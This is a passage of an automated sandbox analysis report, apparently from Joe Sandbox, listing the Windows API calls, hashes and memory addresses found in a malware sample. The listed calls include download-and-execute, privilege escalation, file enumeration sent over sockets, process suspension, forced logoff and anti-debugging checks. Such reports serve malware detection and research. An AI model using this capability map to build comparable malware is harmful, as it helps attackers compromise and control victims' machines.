                                                  • Opcode ID: 2b08fc0de606d6c1079b33fa055d885014e221de781cc0018e6c9e2278479f74
                                                  • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                  • Opcode Fuzzy Hash: 2b08fc0de606d6c1079b33fa055d885014e221de781cc0018e6c9e2278479f74
                                                  • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 020F7CF8
                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7DB1
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7DD5
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7EDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                  • Instruction ID: c6d75c12974abd62a87b2cd022659487adaf34d3563b45aa35baf89fc174390a
                                                  • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                  • Instruction Fuzzy Hash: D35184729803089FCF84FB64DC55AED777AAF10300F904169AE06979A1EF34AB49DF91
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448067
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 02106D2B
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02106D32
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 02106D44
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02106D63
                                                  • GetLastError.KERNEL32 ref: 02106D69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3534403312-0
                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$open
                                                  • API String ID: 2825088817-4030966745
                                                  • Opcode ID: 7d739b8c9cecda73c66bc233b7c3130580c49edd6ebf268341edc09ee1dadd3d
                                                  • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                  • Opcode Fuzzy Hash: 7d739b8c9cecda73c66bc233b7c3130580c49edd6ebf268341edc09ee1dadd3d
                                                  • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                  APIs
                                                    • Part of subcall function 0210271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0210273E
                                                    • Part of subcall function 0210271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0210275C
                                                    • Part of subcall function 0210271E: RegCloseKey.ADVAPI32(00000000), ref: 02102767
                                                  • Sleep.KERNEL32(00000BB8), ref: 020FE86A
                                                  • ExitProcess.KERNEL32 ref: 020FE8D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: pth_unenc$BG
                                                  • API String ID: 2281282204-2233081382
                                                  • Opcode ID: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                  • Instruction ID: 3e8ae2e5e8a1e5b960415a45fc19e3549067e13863a4663288a5edc97807d885
                                                  • Opcode Fuzzy Hash: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                  • Instruction Fuzzy Hash: F0214D31FC03102FD65476788C59BAE359BAB80701F104028FD0557ADAFFA58A009BA7
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: x@G$x@G
                                                  • API String ID: 4113138495-3390264752
                                                  • Opcode ID: 2e9fe5891ca909c14bddfbf6d10d3c01b0e81bea8535e51ef79ab1feb41539ab
                                                  • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                  • Opcode Fuzzy Hash: 2e9fe5891ca909c14bddfbf6d10d3c01b0e81bea8535e51ef79ab1feb41539ab
                                                  • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 020F6D44
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 020F6E0C
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: x@G$x@G
                                                  • API String ID: 4113138495-3390264752
                                                  • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                  • Instruction ID: 6ddb9e11b1c9976eef715c7484b17cddc4472b28b422de2fbf5aaafbebdfe15f
                                                  • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                  • Instruction Fuzzy Hash: 53218B321843409FC694FB60DC90DEF77AEAF90350F400A29EB9652990EF35AA08DE52
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                    • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                    • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: e5df99cdfa2bec7ecdd69478f77dcf55b6c35abd6d75edfc20efbd154db84599
                                                  • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                  • Opcode Fuzzy Hash: e5df99cdfa2bec7ecdd69478f77dcf55b6c35abd6d75edfc20efbd154db84599
                                                  • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                  • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02133F5A,?,?,?,?,021339B1,?,00000004), ref: 02140DC8
                                                  • _wcschr.LIBVCRUNTIME ref: 02140E58
                                                  • _wcschr.LIBVCRUNTIME ref: 02140E66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02133F5A,00000000,0213407A), ref: 02140F09
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
                                                  • Instruction ID: c63ca44af7b76a16617f44879c21ca186bb869c222db89836b119af85f0a812e
                                                  • Opcode Fuzzy Hash: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
                                                  • Instruction Fuzzy Hash: C0610772690206AED72CAB36CC41FA673A9EF4C314F14057AEA0DDB180EF75E955CB60
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 301083792-0
                                                  • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                  • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                  • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                  • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                  • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                  APIs
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 02105BC2
                                                  • LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 02105BD7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02105BDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressExitLibraryLoadProcWindows
                                                  • String ID:
                                                  • API String ID: 1366546845-0
                                                  • Opcode ID: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
                                                  • Instruction ID: fc47ec442e608224663d8c802067f6e61a5430eead67ed7d62060803ffe2fd67
                                                  • Opcode Fuzzy Hash: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
                                                  • Instruction Fuzzy Hash: ED21CA716C43059FCB54B7704894AFE779BAF41341F810829B60697DC1EF64C90AAF56
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0212A9BC
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0212A9C6
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0212A9D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction ID: de0b5adbefd6ff6e775c696da2fa8ab7ee234f911b05d73504d18f0d571769e0
                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction Fuzzy Hash: 6B31C4759412289BCB21DF64D9887DCBBB8BF08311F5042EAF81CA7250E7749B958F45
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00471B2C,00000000,0212282C,00000034,00471B2C,?,?), ref: 02122BB3
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,021228BE,00000000,?,00000000), ref: 02122BC9
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,021228BE,00000000,?,00000000,0210D9C7), ref: 02122BDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction ID: c34e6d48eb457865e1b27a2ea78a2e461fbebc31bc17b0f5af2e8dd255b3fbfe
                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction Fuzzy Hash: 5CE06D3124C220BAEB310E25BC08FAA3A949B81B71F610638FA51A40E4D77184548618
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                  • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                  • ExitProcess.KERNEL32 ref: 0044258E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002,00000000), ref: 021327DC
                                                  • TerminateProcess.KERNEL32(00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002,00000000), ref: 021327E3
                                                  • ExitProcess.KERNEL32 ref: 021327F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction ID: 1b2b914b034be53edf4ee62566a45114fa4e6149a38893fc2d6791968d1b0ad5
                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction Fuzzy Hash: 60E0BD36044208EFCF127F65ED48A893B6AEB50382F0040B4FC499A532CB35ED82CAA4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
